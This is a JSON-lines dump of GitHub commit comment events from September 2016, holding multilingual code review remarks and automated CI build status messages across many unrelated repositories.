{"id":"4539437662","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18960842,"position":65,"line":342,"path":"cura/BuildVolume.py","commit_id":"35168ddd5a7ce0cf2b974d3f377c58fac876a8bd","created_at":"2016-09-09T10:59:33Z","updated_at":"2016-09-09T10:59:33Z","body":"Yes, we remove commented code. Only in some exceptional cases do I allow it in my code reviews, for instance when there is some weird optimisation going on and the old code is there for clarification:\r\n\r\n    #if do_negate:\r\n    #    value = -value\r\n    value = (value ^ -do_negate) + do_negate #Optimised version."}},"created_at":"2016-09-09T10:59:33Z"}
{"id":"4539437967","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18960843,"position":null,"line":null,"path":null,"commit_id":"5eb9d4229f67d17596e3ae30d2500ae37d3903ad","created_at":"2016-09-09T10:59:38Z","updated_at":"2016-09-09T10:59:38Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 977](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13023&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:09:39"}},"created_at":"2016-09-09T10:59:38Z"}
{"id":"4539438854","type":"CommitCommentEvent","actor":{"login":"hrj"},"repo":{"name":"oswetto/Loboevolution"},"payload":{"comment":{"id":18960844,"position":null,"line":null,"path":null,"commit_id":"22e640e0c4dcb0a91738521dc68a873685bcd804","created_at":"2016-09-09T10:59:53Z","updated_at":"2016-09-09T10:59:53Z","body":"Ah yes, I noticed it now. Thanks!"}},"created_at":"2016-09-09T10:59:53Z"}
{"id":"4539440712","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":18960849,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-09T11:00:24Z","updated_at":"2016-09-09T11:00:24Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.162](http://build.clear-measure.com/viewLog.html?buildId=10400&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) is now running\n"}},"created_at":"2016-09-09T11:00:24Z"}
{"id":"4539443963","type":"CommitCommentEvent","actor":{"login":"MieWinstrup"},"repo":{"name":"Septima/qgis-geosearch"},"payload":{"comment":{"id":18960856,"position":null,"line":null,"path":null,"commit_id":"7da9849b98705a23589dfce7537772df3a86448e","created_at":"2016-09-09T11:01:10Z","updated_at":"2016-09-09T11:01:10Z","body":"Giver følgende settingsdialog:\r\n![geosearch_symbology](https://cloud.githubusercontent.com/assets/16276034/18384873/6647f28c-768d-11e6-815a-e62a30c0adc3.png)"}},"created_at":"2016-09-09T11:01:10Z"}
{"id":"4539444991","type":"CommitCommentEvent","actor":{"login":"Nomon"},"repo":{"name":"labstack/echo"},"payload":{"comment":{"id":18960857,"position":5,"line":30,"path":"context.go","commit_id":"2d772e02cafe06456a1cb5f887248fc79ce9e5f1","created_at":"2016-09-09T11:01:25Z","updated_at":"2016-09-09T11:01:25Z","body":"Why was the Context() removed? We use it quite extensively to add items into the underlaying context.\r\nc.SetContext(logging.NewContext(c.Context(), logger)) etc."}},"created_at":"2016-09-09T11:01:25Z"}
{"id":"4539445722","type":"CommitCommentEvent","actor":{"login":"1xxxx"},"repo":{"name":"1xxxx/1xxxx.github.io"},"payload":{"comment":{"id":18960859,"position":null,"line":null,"path":null,"commit_id":"5aafc03ee73d54ca660244f3ed59cf631f5cd9f8","created_at":"2016-09-09T11:01:37Z","updated_at":"2016-09-09T11:01:37Z","body":"``"}},"created_at":"2016-09-09T11:01:37Z"}
{"id":"4539449823","type":"CommitCommentEvent","actor":{"login":"KcNirvana"},"repo":{"name":"KcNirvana/MA-XML-8.0-PORTUGUESE"},"payload":{"comment":{"id":18960863,"position":null,"line":null,"path":null,"commit_id":"3282cfb5713a4a8dd1301ef09634762f17555591","created_at":"2016-09-09T11:02:38Z","updated_at":"2016-09-09T11:02:38Z","body":"Para testares é simples.\r\nUma vez que dá erro compilar a rom toda, compilas so o Settings.apk.\r\nMetes esse file na rom ( System/priv-app/Settings.apk) e instalas novamente a rom"}},"created_at":"2016-09-09T11:02:38Z"}
{"id":"4539449845","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":18960864,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-09T11:02:39Z","updated_at":"2016-09-09T11:02:39Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.162](http://build.clear-measure.com/viewLog.html?buildId=10400&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72, ignored: 2 Build time: 00:02:15"}},"created_at":"2016-09-09T11:02:39Z"}
{"id":"4539450287","type":"CommitCommentEvent","actor":{"login":"helloMikkie"},"repo":{"name":"helloMikkie/radsketch"},"payload":{"comment":{"id":18960865,"position":2,"line":2,"path":"radsketch.pde","commit_id":"eb374fe6230344d40c9a13376637304e686f3f30","created_at":"2016-09-09T11:02:47Z","updated_at":"2016-09-09T11:02:47Z","body":"Größe anödet sich"}},"created_at":"2016-09-09T11:02:47Z"}
{"id":"4539452724","type":"CommitCommentEvent","actor":{"login":"TingPing"},"repo":{"name":"hexchat/hexchat"},"payload":{"comment":{"id":18960872,"position":null,"line":null,"path":null,"commit_id":"ec12871e60796e5ce63303c5be8c75f146edfef8","created_at":"2016-09-09T11:03:26Z","updated_at":"2016-09-09T11:03:26Z","body":"We want Unix endings everywhere since many users share files with their Linux machines. There is only one editor in the universe that doesn't support it, Notepad, which i didn't realize after release."}},"created_at":"2016-09-09T11:03:26Z"}
{"id":"4539454071","type":"CommitCommentEvent","actor":{"login":"luismanuel001"},"repo":{"name":"distributev/the-app"},"payload":{"comment":{"id":18960873,"position":null,"line":null,"path":null,"commit_id":"9683a587e28f96f470a304f3c8edc5a466422374","created_at":"2016-09-09T11:03:49Z","updated_at":"2016-09-09T11:03:49Z","body":"That's correct, everything is compiled on the server using ng-node-compile, and on the client, it is purely for previewing purposes.\r\n\r\nI'll add some logic to the backend to also add the domain to the *_permalink for full urls when for the special case of CSV import."}},"created_at":"2016-09-09T11:03:49Z"}
{"id":"4539457229","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18960905,"position":null,"line":null,"path":null,"commit_id":"2794bee88aee15713b7bde1041f842824e80ec31","created_at":"2016-09-09T11:04:40Z","updated_at":"2016-09-09T11:04:40Z","body":"Dude, you could've at least played your text adventure or something!"}},"created_at":"2016-09-09T11:04:40Z"}
{"id":"4539457630","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18960907,"position":null,"line":null,"path":null,"commit_id":"2794bee88aee15713b7bde1041f842824e80ec31","created_at":"2016-09-09T11:04:47Z","updated_at":"2016-09-09T11:04:47Z","body":"(The old one)"}},"created_at":"2016-09-09T11:04:47Z"}
{"id":"4539460066","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18960912,"position":null,"line":null,"path":null,"commit_id":"60ec043fa884f3ac07005b0da8ee997babc4cb48","created_at":"2016-09-09T11:05:27Z","updated_at":"2016-09-09T11:05:27Z","body":"input_processor_refactor (pshires) - i386-Windows-7-VisualStudio-12: Build Failed\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-60ec043fa884f3ac07005b0da8ee997babc4cb48-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-60ec043fa884f3ac07005b0da8ee997babc4cb48-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-50.72%25-red.svg)</a> \n"}},"created_at":"2016-09-09T11:05:27Z"}
{"id":"4539463794","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"selivanov-d/train_manager"},"payload":{"comment":{"id":18960919,"position":2,"line":2,"path":"app/models/railway_station.rb","commit_id":"379e875263bdaab53eba6d5fb5f802732c4adaf3","created_at":"2016-09-09T11:06:24Z","updated_at":"2016-09-09T11:06:24Z","body":"Попробуй получить список поездов для текущей станции."}},"created_at":"2016-09-09T11:06:24Z"}
{"id":"4539463949","type":"CommitCommentEvent","actor":{"login":"config-i1"},"repo":{"name":"config-i1/smooth"},"payload":{"comment":{"id":18960920,"position":null,"line":null,"path":null,"commit_id":"71e319118badadb36f0381704d34d20f1acd3da8","created_at":"2016-09-09T11:06:26Z","updated_at":"2016-09-09T11:06:26Z","body":"Which of them? :)"}},"created_at":"2016-09-09T11:06:26Z"}
{"id":"4539473307","type":"CommitCommentEvent","actor":{"login":"lava"},"repo":{"name":"lava/mesos"},"payload":{"comment":{"id":18960934,"position":124,"line":251,"path":"3rdparty/stout/include/stout/ip.hpp","commit_id":"8b83489a5cd5e3fe81c98cae3dfe58a7e945376f","created_at":"2016-09-09T11:08:55Z","updated_at":"2016-09-09T11:08:55Z","body":"Please consider that with this proposed change, the possible error messages would look like this: (and the first one is even guaranteed to never happen)\r\n\r\n\"Address family not supported. Address family not supported.\"\r\n\"Failed to parse IPv4: 123.0.x.1. Failed to parse IPv6: 123.0.x.1\""}},"created_at":"2016-09-09T11:08:55Z"}
{"id":"4539474390","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":18960935,"position":null,"line":null,"path":null,"commit_id":"7c7e5eed0a3d9c8a961b01887cbdebbf1b63b899","created_at":"2016-09-09T11:09:13Z","updated_at":"2016-09-09T11:09:13Z","body":"TeamCity libpalaso :: palaso-win32-master Continuous [Build 3.0.771.7c7e5eed0a3d9c8a961b01887cbdebbf1b63b899](http://build.palaso.org/viewLog.html?buildId=76846&buildTypeId=bt223) outcome was **SUCCESS**\nSummary: Tests passed: 3490, ignored: 126 Build time: 00:05:20"}},"created_at":"2016-09-09T11:09:13Z"}
{"id":"4539479165","type":"CommitCommentEvent","actor":{"login":"fire"},"repo":{"name":"octoai/gem-octocore-cassandra"},"payload":{"comment":{"id":18960942,"position":4,"line":5,"path":"README.md","commit_id":"2b16f65a1a3930f242b3fa8618a7b4d65d0484c6","created_at":"2016-09-09T11:10:27Z","updated_at":"2016-09-09T11:10:27Z","body":"Typo"}},"created_at":"2016-09-09T11:10:27Z"}
{"id":"4539479712","type":"CommitCommentEvent","actor":{"login":"siematypie1"},"repo":{"name":"siematypie1/libphonenumber"},"payload":{"comment":{"id":18960944,"position":5,"line":40,"path":"CONTRIBUTING.md","commit_id":"2ae417cf9184cd2acc0579b396f7ac4ad58c422b","created_at":"2016-09-09T11:10:37Z","updated_at":"2016-09-09T11:10:37Z","body":"Once you have signed the CLA, you can request to be whitelisted to send emails to the [libphonenumber-supporting-docs](mailto:libphonenumber-supporting-docs@googlegroups.com) mailbox. Put the GitHub issue number in the subject line and attach the supporting documents. Only the core libphonenumber team has access to view emails sent to this mailbox."}},"created_at":"2016-09-09T11:10:37Z"}
{"id":"4539482410","type":"CommitCommentEvent","actor":{"login":"richelbilderbeek"},"repo":{"name":"richelbilderbeek/KalmanFilterer"},"payload":{"comment":{"id":18960946,"position":null,"line":null,"path":null,"commit_id":"0bb1c6eede56df7119c7ff291d2398d48feb41a0","created_at":"2016-09-09T11:11:21Z","updated_at":"2016-09-09T11:11:21Z","body":"'pseudo-absent': they are not in Boost.Test yet, but probably in constructor calls."}},"created_at":"2016-09-09T11:11:21Z"}
{"id":"4539483204","type":"CommitCommentEvent","actor":{"login":"GrahamCampbell"},"repo":{"name":"bs-thomas/framework"},"payload":{"comment":{"id":18960948,"position":null,"line":null,"path":null,"commit_id":"7df679bc9ae0e37b4a57ba195cd0f015b2952c1f","created_at":"2016-09-09T11:11:34Z","updated_at":"2016-09-09T11:11:34Z","body":"This doesn't look correct. Symfony already handles this."}},"created_at":"2016-09-09T11:11:34Z"}
{"id":"4539483241","type":"CommitCommentEvent","actor":{"login":"lava"},"repo":{"name":"lava/mesos"},"payload":{"comment":{"id":18960949,"position":143,"line":286,"path":"3rdparty/stout/include/stout/ip.hpp","commit_id":"8b83489a5cd5e3fe81c98cae3dfe58a7e945376f","created_at":"2016-09-09T11:11:35Z","updated_at":"2016-09-09T11:11:35Z","body":"I was trying to follow the mesos c++ style guide:\r\n\r\n    Type inference (auto and decltype). The main goal is to increase code readability. This is safely the case if the exact same type omitted on the left is already fully stated on the right. \r\n\r\nI don't personally care, so if you would like to see the type written out both times I will change it."}},"created_at":"2016-09-09T11:11:35Z"}
{"id":"4539483511","type":"CommitCommentEvent","actor":{"login":"ypresto"},"repo":{"name":"ergovia-mobile/android-transcoder"},"payload":{"comment":{"id":18960950,"position":null,"line":null,"path":null,"commit_id":"615042896833aaab7fa6f0be19d582fca6291eca","created_at":"2016-09-09T11:11:39Z","updated_at":"2016-09-09T11:11:39Z","body":":tada: https://github.com/ypresto/android-transcoder/pull/36"}},"created_at":"2016-09-09T11:11:39Z"}
{"id":"4539485494","type":"CommitCommentEvent","actor":{"login":"Lippe35"},"repo":{"name":"KcNirvana/MA-XML-8.0-PORTUGUESE"},"payload":{"comment":{"id":18960953,"position":null,"line":null,"path":null,"commit_id":"3282cfb5713a4a8dd1301ef09634762f17555591","created_at":"2016-09-09T11:12:12Z","updated_at":"2016-09-09T11:12:12Z","body":"Ok vou testar por enquanto só actualizei os files settings no Hermes"}},"created_at":"2016-09-09T11:12:12Z"}
{"id":"4539485820","type":"CommitCommentEvent","actor":{"login":"mihaibivol"},"repo":{"name":"inspirehep/inspire-next"},"payload":{"comment":{"id":18960954,"position":5,"line":93,"path":"docker-compose.test.yml","commit_id":"66bd35db674450b12e7400dae25cc4e60a9c6601","created_at":"2016-09-09T11:12:16Z","updated_at":"2016-09-09T11:12:16Z","body":"I think now we just need to forward the environment variables inside the container.\r\n\r\nhttps://docs.docker.com/compose/compose-file/#/environment\r\n> Environment variables with only a key are resolved to their values on the machine Compose is running on, which can be helpful for secret or host-specific values.\r\n\r\n"}},"created_at":"2016-09-09T11:12:16Z"}
{"id":"4539487054","type":"CommitCommentEvent","actor":{"login":"kabalin"},"repo":{"name":"config-i1/smooth"},"payload":{"comment":{"id":18960956,"position":null,"line":null,"path":null,"commit_id":"71e319118badadb36f0381704d34d20f1acd3da8","created_at":"2016-09-09T11:12:35Z","updated_at":"2016-09-09T11:12:35Z","body":"This particular commit  71e3191.,"}},"created_at":"2016-09-09T11:12:35Z"}
{"id":"4539487339","type":"CommitCommentEvent","actor":{"login":"luastoned"},"repo":{"name":"luastoned/turbo-telegram"},"payload":{"comment":{"id":18960957,"position":397,"line":385,"path":"telegram.lua","commit_id":"3e12303127fe9f3a39f7af088d43a278173aea19","created_at":"2016-09-09T11:12:41Z","updated_at":"2016-09-09T11:12:41Z","body":"How are you using it?\r\n\r\n    local bot = telegram.createBot(\"botid:hash\")\r\n    local tbl = bot:getMe()\r\n"}},"created_at":"2016-09-09T11:12:41Z"}
{"id":"4539488051","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/chorus"},"payload":{"comment":{"id":18960959,"position":null,"line":null,"path":null,"commit_id":"d475f2bf8839ccbb75f187127965b976a88563e9","created_at":"2016-09-09T11:12:53Z","updated_at":"2016-09-09T11:12:53Z","body":"TeamCity Chorus :: chorus-win32-master Continuous [Build 2.6.269.d475f2bf8839ccbb75f187127965b976a88563e9](http://build.palaso.org/viewLog.html?buildId=76842&buildTypeId=bt2) outcome was **SUCCESS**\nSummary: Tests passed: 949, ignored: 50 Build time: 00:27:13"}},"created_at":"2016-09-09T11:12:53Z"}
{"id":"4539494215","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18960972,"position":null,"line":null,"path":null,"commit_id":"e752c137a98936da0771a7e56a9ac3b37f1c6741","created_at":"2016-09-09T11:14:30Z","updated_at":"2016-09-09T11:14:30Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#e2jPmCwIR1ejD6jhXv7ZVg"}},"created_at":"2016-09-09T11:14:30Z"}
{"id":"4539495243","type":"CommitCommentEvent","actor":{"login":"config-i1"},"repo":{"name":"config-i1/smooth"},"payload":{"comment":{"id":18960974,"position":null,"line":null,"path":null,"commit_id":"71e319118badadb36f0381704d34d20f1acd3da8","created_at":"2016-09-09T11:14:49Z","updated_at":"2016-09-09T11:14:49Z","body":"Okay. Are you serious? What type of conflicts then? I didn't bother to look at the license again since 8 months ago..."}},"created_at":"2016-09-09T11:14:49Z"}
{"id":"4539498335","type":"CommitCommentEvent","actor":{"login":"kabalin"},"repo":{"name":"config-i1/smooth"},"payload":{"comment":{"id":18960978,"position":null,"line":null,"path":null,"commit_id":"71e319118badadb36f0381704d34d20f1acd3da8","created_at":"2016-09-09T11:15:37Z","updated_at":"2016-09-09T11:15:37Z","body":"Your gitignore is not working at the moment as containing lines that does not meet its syntax."}},"created_at":"2016-09-09T11:15:37Z"}
{"id":"4539504751","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"antonefremov/ror-basics-course"},"payload":{"comment":{"id":18960988,"position":4,"line":4,"path":"Lesson_5/producer.rb","commit_id":"7822ef02e4923559ad55c29e6ec0251cc378c68c","created_at":"2016-09-09T11:17:24Z","updated_at":"2016-09-09T11:17:24Z","body":"Зачем же вручную определять аксессоры которые уже определены с помощью `attr_accessor`?"}},"created_at":"2016-09-09T11:17:24Z"}
{"id":"4539506969","type":"CommitCommentEvent","actor":{"login":"besteffornice"},"repo":{"name":"knownsec/KCon"},"payload":{"comment":{"id":18960991,"position":null,"line":null,"path":null,"commit_id":"cca9e5755f3b5bf807e0269dde0dd8775d62636b","created_at":"2016-09-09T11:17:58Z","updated_at":"2016-09-09T11:17:58Z","body":"aaaaaa"}},"created_at":"2016-09-09T11:17:58Z"}
{"id":"4539507393","type":"CommitCommentEvent","actor":{"login":"kabalin"},"repo":{"name":"config-i1/smooth"},"payload":{"comment":{"id":18960994,"position":null,"line":null,"path":null,"commit_id":"71e319118badadb36f0381704d34d20f1acd3da8","created_at":"2016-09-09T11:18:05Z","updated_at":"2016-09-09T11:18:05Z","body":"Basically, I think you had merge conflict which you committed as it is, thus there are '>>>>' lines in those files."}},"created_at":"2016-09-09T11:18:05Z"}
{"id":"4539511721","type":"CommitCommentEvent","actor":{"login":"Lutando"},"repo":{"name":"IdentityServer/IdentityServer4"},"payload":{"comment":{"id":18961004,"position":null,"line":null,"path":null,"commit_id":"6b97628504f8f0151949cb945bc289594afd9f57","created_at":"2016-09-09T11:19:21Z","updated_at":"2016-09-09T11:19:21Z","body":"I had a little dig into that issue and the main problem from wasn't actually getting the discovery document. The NullReference on https://github.com/IdentityServer/IdentityServer4/issues/269 Exception only happened when you did a HTTP get on the `jwks_uri`. This test still passes even if the previous bug is present. I think its because the `DiscoveryClient` does lazy loading when it comes to loading the `jwks` resource.\r\n\r\nA more completed test for issue 269 would be to assert that doc.Keys is not null.\r\n\r\nperhaps `doc.Keys.Should().NotBeNull()` could go after line 33 to check for that specific bug."}},"created_at":"2016-09-09T11:19:21Z"}
{"id":"4539512253","type":"CommitCommentEvent","actor":{"login":"Clement95"},"repo":{"name":"Clement95/MyHomebrewPacks"},"payload":{"comment":{"id":18961005,"position":null,"line":null,"path":null,"commit_id":"306668969ca4a8c95bee946003375dc3cf8c83c6","created_at":"2016-09-09T11:19:30Z","updated_at":"2016-09-09T11:19:30Z","body":"Test"}},"created_at":"2016-09-09T11:19:30Z"}
{"id":"4539512393","type":"CommitCommentEvent","actor":{"login":"Clement95"},"repo":{"name":"Clement95/MyHomebrewPacks"},"payload":{"comment":{"id":18961006,"position":null,"line":null,"path":null,"commit_id":"306668969ca4a8c95bee946003375dc3cf8c83c6","created_at":"2016-09-09T11:19:32Z","updated_at":"2016-09-09T11:19:32Z","body":"Test"}},"created_at":"2016-09-09T11:19:32Z"}
{"id":"4539513604","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"antonefremov/ror-basics-course"},"payload":{"comment":{"id":18961008,"position":10,"line":10,"path":"Lesson_5/train.rb","commit_id":"7822ef02e4923559ad55c29e6ec0251cc378c68c","created_at":"2016-09-09T11:19:52Z","updated_at":"2016-09-09T11:19:52Z","body":"В Ruby принятно именовать методы **в нижнем регистре, отделяя слова нижним подчёркиванием**: `get_train_by_number`. Но лучше как в задании назвать этот метод, чтобы вызов был таким: `Train.find()`."}},"created_at":"2016-09-09T11:19:52Z"}
{"id":"4539517904","type":"CommitCommentEvent","actor":{"login":"monagai"},"repo":{"name":"NCCJapan/cisCall5_doc"},"payload":{"comment":{"id":18961012,"position":12,"line":16,"path":"doc/INSTALL.md","commit_id":"6673980a93bbb9aea1c1af9be411fd642974ea92","created_at":"2016-09-09T11:20:59Z","updated_at":"2016-09-09T11:20:59Z","body":"ここ、特に英語が怪しい気がします。(他もですが)遠慮なくご指摘ください。\r\n"}},"created_at":"2016-09-09T11:20:59Z"}
{"id":"4539520404","type":"CommitCommentEvent","actor":{"login":"monagai"},"repo":{"name":"NCCJapan/cisCall5_doc"},"payload":{"comment":{"id":18961017,"position":25,"line":39,"path":"doc/INSTALL.md","commit_id":"6673980a93bbb9aea1c1af9be411fd642974ea92","created_at":"2016-09-09T11:21:39Z","updated_at":"2016-09-09T11:21:39Z","body":"typoあり"}},"created_at":"2016-09-09T11:21:39Z"}
{"id":"4539520439","type":"CommitCommentEvent","actor":{"login":"avg206"},"repo":{"name":"Guseff/test2"},"payload":{"comment":{"id":18961018,"position":6,"line":7,"path":"server.js","commit_id":"9319bdab08596ebc761a3cae173269f5d7a4a7ed","created_at":"2016-09-09T11:21:40Z","updated_at":"2016-09-09T11:21:40Z","body":"Вот тут можно убрать `require('express')` и заменять просто на `express`, так как ты его выше уже подключил в переменную"}},"created_at":"2016-09-09T11:21:40Z"}
{"id":"4539521448","type":"CommitCommentEvent","actor":{"login":"paul-blundell"},"repo":{"name":"engram-design/CPNav"},"payload":{"comment":{"id":18961019,"position":null,"line":null,"path":null,"commit_id":"3ead3f21d0a995a36f9f42fe86fa5718fea03825","created_at":"2016-09-09T11:21:56Z","updated_at":"2016-09-09T11:21:56Z","body":"How come composer was removed from this plugin?"}},"created_at":"2016-09-09T11:21:56Z"}
{"id":"4539522334","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"antonefremov/ror-basics-course"},"payload":{"comment":{"id":18961025,"position":21,"line":21,"path":"Lesson_5/train.rb","commit_id":"7822ef02e4923559ad55c29e6ec0251cc378c68c","created_at":"2016-09-09T11:22:11Z","updated_at":"2016-09-09T11:22:11Z","body":"Используешь здесь переменную класса. Что будет в этой ситуации:\r\n\r\n```ruby\r\nred_arrow = TrainPassenger.new(number: 290)\r\ncargo_star = TrainCargo.new(number: 290)\r\n\r\nTrainPassenger.getTrainByNumber(290)\r\n```"}},"created_at":"2016-09-09T11:22:11Z"}
{"id":"4539523571","type":"CommitCommentEvent","actor":{"login":"StIch0"},"repo":{"name":"StIch0/SimpleStac"},"payload":{"comment":{"id":18961029,"position":null,"line":null,"path":null,"commit_id":"4567e3a08b7137768da9245fb14aab373d497864","created_at":"2016-09-09T11:22:29Z","updated_at":"2016-09-09T11:22:29Z","body":"prealfa"}},"created_at":"2016-09-09T11:22:29Z"}
{"id":"4539523651","type":"CommitCommentEvent","actor":{"login":"config-i1"},"repo":{"name":"config-i1/smooth"},"payload":{"comment":{"id":18961030,"position":null,"line":null,"path":null,"commit_id":"71e319118badadb36f0381704d34d20f1acd3da8","created_at":"2016-09-09T11:22:30Z","updated_at":"2016-09-09T11:22:30Z","body":"Interesting!\r\nI think that .gitignore works as it should, but you are right about '>>>>'. I haven't noticed. I'll look through files...\r\nThanks!"}},"created_at":"2016-09-09T11:22:30Z"}
{"id":"4539524574","type":"CommitCommentEvent","actor":{"login":"kpmeen"},"repo":{"name":"MUSIT-Norway/musit"},"payload":{"comment":{"id":18961033,"position":24,"line":45,"path":"service_storage_admin/src/main/scala/no/uio/musit/microservice/storageAdmin/dao/StorageUnitDao.scala","commit_id":"e7cd0c8c1b215e1d879e84cafef0e8add5b55833","created_at":"2016-09-09T11:22:45Z","updated_at":"2016-09-09T11:22:45Z","body":"```scala\r\noptSelf.flatMap {\r\n  case None => Future.successful(Seq.empty)\r\n  case Some(self) =>\r\n}\r\n```"}},"created_at":"2016-09-09T11:22:45Z"}
{"id":"4539524737","type":"CommitCommentEvent","actor":{"login":"akheron"},"repo":{"name":"akheron/jansson"},"payload":{"comment":{"id":18961034,"position":null,"line":null,"path":null,"commit_id":"012c5f0ecac48db286d4d737133b6d64d128939c","created_at":"2016-09-09T11:22:48Z","updated_at":"2016-09-09T11:22:48Z","body":"I'm glad to hear you like it :)"}},"created_at":"2016-09-09T11:22:48Z"}
{"id":"4539527940","type":"CommitCommentEvent","actor":{"login":"monagai"},"repo":{"name":"NCCJapan/cisCall5_doc"},"payload":{"comment":{"id":18961055,"position":12,"line":16,"path":"doc/INSTALL.md","commit_id":"6673980a93bbb9aea1c1af9be411fd642974ea92","created_at":"2016-09-09T11:23:43Z","updated_at":"2016-09-09T11:23:43Z","body":"typoあり"}},"created_at":"2016-09-09T11:23:43Z"}
{"id":"4539528440","type":"CommitCommentEvent","actor":{"login":"Asunny-ren"},"repo":{"name":"Asunny-ren/workDetail"},"payload":{"comment":{"id":18961063,"position":null,"line":null,"path":null,"commit_id":"33759430691e8276abd5690375191c5e4719fe75","created_at":"2016-09-09T11:23:50Z","updated_at":"2016-09-09T11:23:50Z","body":"timeout有时间分析一下"}},"created_at":"2016-09-09T11:23:50Z"}
{"id":"4539529355","type":"CommitCommentEvent","actor":{"login":"monagai"},"repo":{"name":"NCCJapan/cisCall5_doc"},"payload":{"comment":{"id":18961065,"position":17,"line":17,"path":"doc/INSTALL.md","commit_id":"6673980a93bbb9aea1c1af9be411fd642974ea92","created_at":"2016-09-09T11:24:07Z","updated_at":"2016-09-09T11:24:07Z","body":"remote desk top -> remote desktop"}},"created_at":"2016-09-09T11:24:07Z"}
{"id":"4539530017","type":"CommitCommentEvent","actor":{"login":"lava"},"repo":{"name":"lava/mesos"},"payload":{"comment":{"id":18961068,"position":212,"line":376,"path":"3rdparty/stout/include/stout/ip.hpp","commit_id":"8b83489a5cd5e3fe81c98cae3dfe58a7e945376f","created_at":"2016-09-09T11:24:18Z","updated_at":"2016-09-09T11:24:18Z","body":"Why do you think so? From the name, I would expect the function to just count the set bits without caring for their order, but I will admit that I don't fully understand the bit magic going on there. "}},"created_at":"2016-09-09T11:24:18Z"}
{"id":"4539531772","type":"CommitCommentEvent","actor":{"login":"vvakame"},"repo":{"name":"DefinitelyTyped/DefinitelyTyped"},"payload":{"comment":{"id":18961070,"position":16,"line":127,"path":"angularjs/angular.d.ts","commit_id":"12ede35d5b3d5d5595ce6edf41f6f1a96ea33d1f","created_at":"2016-09-09T11:24:46Z","updated_at":"2016-09-09T11:24:46Z","body":"you are right. please send a pull request."}},"created_at":"2016-09-09T11:24:46Z"}
{"id":"4539534194","type":"CommitCommentEvent","actor":{"login":"monagai"},"repo":{"name":"NCCJapan/cisCall5_doc"},"payload":{"comment":{"id":18961075,"position":22,"line":36,"path":"doc/INSTALL.md","commit_id":"6673980a93bbb9aea1c1af9be411fd642974ea92","created_at":"2016-09-09T11:25:25Z","updated_at":"2016-09-09T11:25:25Z","body":"ここじゃなくて、1個前の手番ですが、wgetを書くのは辞めます(URLは入れるが)"}},"created_at":"2016-09-09T11:25:25Z"}
{"id":"4539534374","type":"CommitCommentEvent","actor":{"login":"kieranjol"},"repo":{"name":"avarchival/AS11scripts"},"payload":{"comment":{"id":18961076,"position":null,"line":null,"path":null,"commit_id":"2f47bbdc0eb50a6aeceaaac7fea17ff07f1451a5","created_at":"2016-09-09T11:25:27Z","updated_at":"2016-09-09T11:25:27Z","body":":+1: :fireworks: :tada: "}},"created_at":"2016-09-09T11:25:27Z"}
{"id":"4539537098","type":"CommitCommentEvent","actor":{"login":"ChrisTonks"},"repo":{"name":"chmln/flatpickr"},"payload":{"comment":{"id":18961081,"position":110,"line":908,"path":"dist/flatpickr.js","commit_id":"4a54c69302893f2a7374054f40d726617b80a5aa","created_at":"2016-09-09T11:26:13Z","updated_at":"2016-09-09T11:26:13Z","body":"This has broken manual input from my experience, because the function timeWrapper() gets called on an 'input' event not a 'keydown' event, and thus always blurs the control after a single keystroke. This means two-digit values cannot be entered. The control started working properly for me when I removed this line. On Chrome and IE Mobile (Windows Phone 8.1)."}},"created_at":"2016-09-09T11:26:13Z"}
{"id":"4539540125","type":"CommitCommentEvent","actor":{"login":"AppSynergy"},"repo":{"name":"AppSynergy/swl-website"},"payload":{"comment":{"id":18961089,"position":null,"line":null,"path":null,"commit_id":"ed1f4630bd5156753237ac34452adb232e0d28bf","created_at":"2016-09-09T11:27:04Z","updated_at":"2016-09-09T11:27:04Z","body":"It's in both, I sync.\r\n\r\nhttps://github.com/springweblobby/swl-website/commit/ed1f4630bd5156753237ac34452adb232e0d28bf"}},"created_at":"2016-09-09T11:27:04Z"}
